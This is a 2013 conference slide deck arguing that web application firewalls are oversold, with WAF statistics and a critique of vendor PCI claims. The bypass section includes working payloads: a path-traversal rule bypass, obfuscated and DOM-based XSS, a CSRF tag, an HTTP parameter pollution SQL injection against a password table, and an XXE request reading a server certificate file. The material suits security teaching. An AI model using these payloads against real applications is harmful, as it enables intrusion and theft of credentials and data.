1 We protect your applications! No, you don't. Digicomp Hacking Day 2013, May 16th 2013
2 Sven Vetsch, Partner & CTO at Redguard AG. Specialized in Application Security (Web, Web-Services, Mobile, ...). Leader OWASP Switzerland / sven.vetsch@redguard.ch
4 Disclaimer: This presentation is focused on classic WAF functionality, so we won't get into Single Sign-On, Content Injection and so on. All the views in this presentation are my own and not necessarily those of Redguard AG.
5 Outline: WAF in numbers; What do vendors tell you; Bypassing techniques
6 I Intro
7 >80% of organizations were attacked successfully at least once in 2011 (Perceptions About Network Security, Ponemon Institute Research Report, 2011)
8 Companies hacked in 2012/2013
9 23% already experienced a data or system breach as a result of an application layer vulnerability (WhiteHat Security Website Security Statistics Report, May 2013)
10 55.6% of all organizations use WAFs, only 29% in banking (WhiteHat Security Website Security Statistics Report, May 2013)
11 WAF Deployment by Industry [chart: industries Banking, Financial Services, Healthcare, Retail, Technology; categories Monitoring and actively blocking attacks, Currently only monitoring traffic, Installing and/or configuration mode, No WAF deployed, Don't know] (WhiteHat Security Website Security Statistics Report, May 2013)
12 WAF usage after a breach [pie chart: categories Monitoring and actively blocking attacks, Currently only monitoring traffic, Installing and/or configuration mode, No WAF deployed, Don't know; slices 38%, 31%, 19%, 6%, 6%] (WhiteHat Security Website Security Statistics Report, May 2013)
13 62% of attacks can be blocked by a WAF with default rule sets (NT OBJECTives, Analyzing the Effectiveness of Web Application Firewalls, 2011)
14 Organizations with a Web Application Firewall deployed had 11% more vulnerabilities, resolved them 8% slower, and had a 7% lower remediation rate (WhiteHat Security Website Security Statistics Report, May 2013)
15 A WAF makes me less secure!?
16 Possible reasons: insufficient global security processes; rules are not sufficient; not enough resources to manage the WAF; WAFs are treated as if they could solve all problems; WAFs are only in monitoring mode instead of blocking anything
17 A WAF is a tool, not a solution
18 Don't worry, there is also good news
19 "By summing all these percentages up we could safely say that a WAF could feasibly help mitigate the risk of at least 71% of all custom web application vulnerabilities" (WhiteHat Security Website Security Statistics Report, May 2012)
20 II Vendor Claims
21 Vendor Supplied Certificate: "[Product] guarantees security of web applications." (12 May 2013, Redguard AG, Sven Vetsch)
22 Vendor Supplied Certificate: "The [Company] Web Application Firewall quickly protects web servers from data breaches and websites from defacement without administrators waiting for clean code or even knowing how an application works."
23 Vendor Supplied Certificate: "Fully addresses PCI 6.6"
24 Vendor Supplied Certificate: "Fully addresses PCI 6.6", compared with PCI Data Security Standard v2, requirement 6.6: "For public-facing web applications, address new threats and vulnerabilities on an ongoing basis and ensure these applications are protected against known attacks by either of the following methods: Reviewing public-facing web applications via manual or automated application vulnerability security assessment tools or methods, at least annually and after any changes; Installing a web-application firewall in front of public-facing web applications." A WAF is one of two options, and 6.6 alone is not PCI compliance.
25 Vendor Supplied Certificate: "Because of its unique blend of HTML and XML security, the [Company] Web Application Firewall provides a full compliance solution for the PCI DSS sections 6.5 and 6.6, which mandate the implementation of a Web application firewall by June 30"
26 Vendor Supplied Certificate: the same claim, compared with PCI Data Security Standard v2, requirement 6.5: "Develop applications based on secure coding guidelines. Prevent common coding vulnerabilities in software development processes, to include the following: [OWASP Top 10]". Requirement 6.5 is a secure-development requirement, not a WAF requirement.
27 Vendor Supplied Certificate: "The [Product] offers you the following technical features: ... Session fixation"
29 III Bypassing WAFs
30 Insecure Rules. Let's take the following pseudo rule, which compares the raw request path against a literal and lets every other path through:
if ($path == "/admin") {
    if ($ipaddr == $internal_ipaddr) [allow request]
    else [block request]
}
31 Insecure Rules: a request for /admin from an external address reaches the WAF, the rule matches and the request is blocked.
32 Insecure Rules: a request for /../admin reaches the WAF, the rule does not match and the request is passed on; the web server then normalises /../admin to /admin and serves the admin interface.
33 Insecure Rules: "/admin" == "/admin" -> true; "/../admin" == "/admin" -> false
34 XSS Obfuscation. When non-security people talk about XSS: <script>alert("xss");</script>
35 XSS Obfuscation. When security people talk about XSS: <script>alert(String.fromCharCode(88,83,83));</script> <IMG SRC=javasc&#x09;ript:a&#108;ert('X&#83;S')>
36 XSS Obfuscation. When appsec people talk about XSS: <script>window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](("XSS"))</script> (the index expression is built from "NaN", "false", "undefined" and "true" and evaluates to the string "alert")
37 XSS Obfuscation When appsec people talk about XSS <script> [][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[] +!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+ [])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+ []]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+ []+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]] +(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([] [[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+ []]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]] ((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[]) [+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+ ([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!! []+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+ [])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[]) [+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+ {})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[]) [+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+ </script> Try it yourself:
38 DOM-based XSS:
<!DOCTYPE html>
<html>
<body>
Hello <span id="name"></span>
<script>
document.getElementById("name").innerHTML = document.location.hash.slice(1);
</script>
</body>
</html>
40 DOM-based XSS
41 DOM-based XSS: #<img src="x" onerror="alert(1)"/>
42 An XSS attack like the one shown never hits the server, so the WAF never sees it.
43 Cross-Site Request Forgery (CSRF): <img src="/buy?article=123" />
44 Without understanding the application or modifying the HTTP response, a WAF can't protect against CSRF attacks.
45 11.2% of all applications are vulnerable to CSRF attacks (WhiteHat Security Website Security Statistics Report, May 2013); in my experience it is more like 50%.
46 HTTP Parameter Pollution (HPP) q=<script>&q=alert("xss")&q=</script>
47 HTTP Parameter Pollution (HPP): how platforms resolve a repeated parameter (id=1&id=2)
Technology      Behavior           Result
ASP / ASP.NET   Concatenation      id=1,2
PHP             Last occurrence    id=2
Java            First occurrence   id=1
48 HTTP Parameter Pollution (HPP). Let's have a look at the following simple pseudo rule against SQL Injection attacks: if $param_id.match(/.*select.*from.*/) [block request]
49 HTTP Parameter Pollution (HPP): the blocked request id=123;select%201,password%20from%20users;%20-- is split into id=123;&id=select%201&id=password%20from%20users;%20--
50 HTTP Parameter Pollution (HPP): id=123;&id=select%201&id=password%20from%20users;%20-- is inspected as three separate values, id = 123; / id = select 1 / id = password from users; --, none of which matches the rule, while the backend concatenates them -> 123; select 1,password from users; --
51 WAF rules are not platform independent
52 More things your WAF isn't good at: anti-automation and process validation; understanding application logic; insufficient authentication & authorization; brute force attacks; session fixation; anomaly detection; improper filesystem permissions; securing client-side code
53 Hacking a WAF (for fun and profit). In the past, WAFs also suffered from vulnerabilities like: filter bypasses (a lot of them!!!); XSS in their web admin interface; CSRF in their web admin interface; default SSH root passwords; information disclosure about the LAN/DMZ; arbitrary remote command execution; XML External Entity (XXE) attacks
54 Hacking a WAF (for fun and profit) Example scenario based on ModSecurity XML External Entity (XXE) vulnerability CVE
55 Hacking a WAF (for fun and profit): [diagram: attacker -> WAF -> web application]
56 Hacking a WAF (for fun and profit): [diagram: the WAF itself reads /etc/apache2/ssl/cert.pem]
57 Hacking a WAF (for fun and profit). Request:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/apache2/ssl/cert.pem" >]><foo>&xxe;</foo>
Response: [contents of /etc/apache2/ssl/cert.pem]
59 IV Wrap Up
60 Conclusion. WAFs: are good, at least they can help you; must be tuned by a trained professional; can't compensate for insecure code; aren't an alternative to patching vulnerabilities; can generate a lot of profit for vendors, so be careful about which features you really need and how well they perform; don't solve all your appsec problems
61 We should accept WAFs for what they really are: a method of increasing the cost of attacks, but not necessarily one that might repel every attacker. Ivan Ristic
62 Q & A
More informationMANAGED SECURITY TESTING
MANAGED SECURITY TESTING SERVICE LEVEL COMPARISON External Network Testing (EVS) Scanning Basic Threats Penetration Testing Network Vulnerability Scan Unauthenticated Web App Scanning Validation Of Scan
More informationDFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationAttack and Penetration Testing 101
Attack and Penetration Testing 101 Presented by Paul Petefish PaulPetefish@Solutionary.com July 15, 2009 Copyright 2000-2009, Solutionary, Inc. All rights reserved. Version 2.2 Agenda Penetration Testing
More informationOWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN
More informationHow To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
More informationApplication Security: What Does it Take to Build and Test a Trusted App? John Dickson, CISSP Denim Group
Application Security: What Does it Take to Build and Test a Trusted App? John Dickson, CISSP Denim Group Overview What is Application Security? Examples of Potential Vulnerabilities Potential Strategies
More informationFinding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft
Finding and Preventing Cross- Site Request Forgery Tom Gallagher Security Test Lead, Microsoft Agenda Quick reminder of how HTML forms work How cross-site request forgery (CSRF) attack works Obstacles
More informationTECHNICAL AUDITS FOR CERTIFYING EUROPEAN CITIZEN COLLECTION SYSTEMS
TECHNICAL AUDITS FOR CERTIFYING EUROPEAN CITIZEN COLLECTION SYSTEMS Technical audits in accordance with Regulation 211/2011 of the European Union and according to Executional Regulation 1179/2011 of the
More informationWeb Application Firewall Policy File Specification
Web Application Firewall Policy File Specification Foreword This document provides instructions for configuring the Web Application Firewall (WAF) feature of the Java EE language version of the OWASP Enterprise
More informationWeb application testing
CL-WTS Web application testing Classroom 2 days Testing plays a very important role in ensuring security and robustness of web applications. Various approaches from high level auditing through penetration
More informationHack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
More informationPCI Compliance Updates
PCI Compliance Updates E-Commerce / Cloud Security Adam Goslin, Chief Operations Officer AGoslin@HighBitSecurity.com Direct: 248.388.4328 PCI Guidance Google: PCI e-commerce guidance https://www.pcisecuritystandards.org/pdfs/pci_dss_v2_ecommerce_guidelines.pdf
More informationThe Security of MDM systems. Hack In Paris 2013 Sebastien Andrivet
The Security of MDM systems Hack In Paris 2013 Sebastien Andrivet Who am I? Sebastien Andrivet Switzerland (Geneva) Specialized in security Mobiles (ios, Android) Forensic Developer C++, x86 and ARM (Cyberfeminist
More informationF5 and Microsoft Exchange Security Solutions
F5 PARTNERSHIP SOLUTION GUIDE F5 and Microsoft Exchange Security Solutions Deploying a service-oriented perimeter for Microsoft Exchange WHAT'S INSIDE Pre-Authentication Mobile Device Security Web Application
More informationReducing Application Vulnerabilities by Security Engineering
Reducing Application Vulnerabilities by Security Engineering - Subash Newton Manager Projects (Non Functional Testing, PT CoE Group) 2008, Cognizant Technology Solutions. All Rights Reserved. The information
More informationCutting the Cost of Application Security
WHITE PAPER Cutting the Cost of Application Security Web application attacks can result in devastating data breaches and application downtime, costing companies millions of dollars in fines, brand damage,
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More information